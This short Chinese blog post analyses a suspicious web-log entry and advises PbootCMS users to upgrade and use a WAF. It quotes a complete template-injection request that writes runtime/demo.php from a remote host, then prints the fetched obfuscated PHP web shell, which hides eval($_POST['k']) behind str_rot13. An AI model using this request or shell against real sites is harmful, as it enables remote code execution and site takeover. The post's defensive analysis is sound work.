警告:涉及木马,请勿运行,本文仅供学习交流,严禁用于破坏活动,产生的一切法律后果本站不承担。如果不同意此警告请立即关闭网站。
最近查看网站日志发现有几条日志十分可疑,该客户端请求的参数为
?tag&tagstpl=news.html&tag={pbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))}ok{/pbohome/Indexot:if}&t=file_put_contents&t1=runtime/demo.php&t2=file_get_contents&t3=http://x.x.x.x/x.txt(IP地址已隐去)
很显然,是想创建一个demo.php文件,这个文件中的内容来自http://x.x.x.x/x.txt
那么x.txt中的内容是什么呢?
4a5feb12465f66947af2f40a4785344e
<?php function a($a="214s2d5"){eval("/*fdf12d1f*/".str_rot13($a)."/*fdf12d1f*/");}a('riny($_CBFG["k"]);');?>
可以发现,原来是要执行$_POST[“k”]的值。用pbootcms系统的请及时升级到最新版本,避免网站遭到攻击。
最后,希望大家使用WAF防火墙,一方面拦截非法木马,另一方面可以拦截一些非法爬虫,具体请看保护网站安全——拦截非法爬虫。